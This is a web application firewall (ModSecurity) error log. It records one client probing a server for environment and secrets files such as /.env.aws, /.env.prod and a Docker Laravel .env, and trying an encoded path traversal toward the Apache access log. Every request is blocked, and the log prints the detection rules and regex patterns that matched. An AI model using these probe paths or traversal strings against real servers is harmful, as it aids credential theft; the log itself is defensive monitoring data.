[Mon May 11 20:55:56.264630 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.docker/.env"] [unique_id "agImPDP5Q_-MBliRCAxnZAAAABg"]
[Mon May 11 20:55:56.265286 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.docker/.env"] [unique_id "agImPDP5Q_-MBliRCAxnZAAAABg"]
[Mon May 11 20:55:56.281920 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agImPJYn-x0CHsbEbP2tuQAAAIo"]
[Mon May 11 20:55:56.282114 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agImPJYn-x0CHsbEbP2tuQAAAIo"]
[Mon May 11 20:55:56.282316 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agImPJYn-x0CHsbEbP2tuQAAAIo"]
[Mon May 11 20:55:56.287688 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agImPNeaRXe5lR8y0ZOS0AAAAVM"]
[Mon May 11 20:55:56.287919 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agImPNeaRXe5lR8y0ZOS0AAAAVM"]
[Mon May 11 20:55:56.288174 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agImPNeaRXe5lR8y0ZOS0AAAAVM"]
[Mon May 11 20:55:56.297114 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.docker/laravel/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.docker/laravel/app/.env"] [unique_id "agImPDP5Q_-MBliRCAxnZQAAABg"]
[Mon May 11 20:55:56.297293 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.docker/laravel/app/.env"] [unique_id "agImPDP5Q_-MBliRCAxnZQAAABg"]
[Mon May 11 20:55:56.297479 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.docker/laravel/app/.env"] [unique_id "agImPDP5Q_-MBliRCAxnZQAAABg"]
[Mon May 11 20:55:56.311749 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agImPNeaRXe5lR8y0ZOS0QAAAVM"]
[Mon May 11 20:55:56.311998 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agImPNeaRXe5lR8y0ZOS0QAAAVM"]
[Mon May 11 20:55:56.312281 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agImPNeaRXe5lR8y0ZOS0QAAAVM"]
[Mon May 11 20:55:56.366017 2026] [security2:error] [pid 1501831:tid 1501841] [client 195.178.110.199:36190] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agImPFNddpkriGUb6ZV20QAAAQg"]
[Mon May 11 20:55:56.366267 2026] [security2:error] [pid 1501831:tid 1501841] [client 195.178.110.199:36190] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%5c found within REQUEST_URI_RAW: /..%5c..%5c..%5c..%5c..%5c..%5cvar/log/apache2/access.log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "conge.tct-telecom.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agImPFNddpkriGUb6ZV20QAAAQg"]
[Mon May 11 20:55:56.366462 2026] [security2:error] [pid 1501831:tid 1501841] [client 195.178.110.199:36190] ModSecurity: Warning. Matched phrase "..\\\\" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ..\\x5c found within REQUEST_URI: /..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cvar/log/apache2/access.log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "conge.tct-telecom.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agImPFNddpkriGUb6ZV20QAAAQg"]
[Mon May 11 20:55:56.367324 2026] [security2:error] [pid 1501831:tid 1501841] [client 195.178.110.199:36190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agImPFNddpkriGUb6ZV20QAAAQg"]
[Mon May 11 20:55:56.370523 2026] [security2:error] [pid 1501831:tid 1501843] [client 195.178.110.199:36064] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agImPFNddpkriGUb6ZV20gAAAQo"]
[Mon May 11 20:55:56.370685 2026] [security2:error] [pid 1501831:tid 1501843] [client 195.178.110.199:36064] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agImPFNddpkriGUb6ZV20gAAAQo"]
[Mon May 11 20:55:56.370883 2026] [security2:error] [pid 1501831:tid 1501841] [client 195.178.110.199:36190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agImPFNddpkriGUb6ZV20QAAAQg"]
[Mon May 11 20:55:56.370973 2026] [security2:error] [pid 1501831:tid 1501843] [client 195.178.110.199:36064] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agImPFNddpkriGUb6ZV20gAAAQo"]
[Mon May 11 20:55:56.380218 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.aws"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.aws"] [unique_id "agImPPjVc-A-CSptvm1xcgAAAFU"]
[Mon May 11 20:55:56.380439 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.aws"] [unique_id "agImPPjVc-A-CSptvm1xcgAAAFU"]
[Mon May 11 20:55:56.380747 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.aws"] [unique_id "agImPPjVc-A-CSptvm1xcgAAAFU"]
[Mon May 11 20:55:56.380875 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agImPCMeXtzav-mi9SyxmwAAAMo"]
[Mon May 11 20:55:56.381049 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agImPCMeXtzav-mi9SyxmwAAAMo"]
[Mon May 11 20:55:56.381894 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agImPCMeXtzav-mi9SyxmwAAAMo"]
[Mon May 11 20:55:56.404808 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agImPPjVc-A-CSptvm1xcwAAAFU"]
[Mon May 11 20:55:56.405094 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agImPPjVc-A-CSptvm1xcwAAAFU"]
[Mon May 11 20:55:56.405385 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agImPPjVc-A-CSptvm1xcwAAAFU"]
[Mon May 11 20:55:56.472385 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.qa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.qa"] [unique_id "agImPCMeXtzav-mi9SyxnAAAANg"]
[Mon May 11 20:55:56.472619 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.qa"] [unique_id "agImPCMeXtzav-mi9SyxnAAAANg"]
[Mon May 11 20:55:56.472832 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.qa"] [unique_id "agImPCMeXtzav-mi9SyxnAAAANg"]
[Mon May 11 20:55:56.477952 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agImPNeaRXe5lR8y0ZOS0wAAAVU"]
[Mon May 11 20:55:56.478131 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agImPNeaRXe5lR8y0ZOS0wAAAVU"]
[Mon May 11 20:55:56.478470 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agImPNeaRXe5lR8y0ZOS0wAAAVU"]
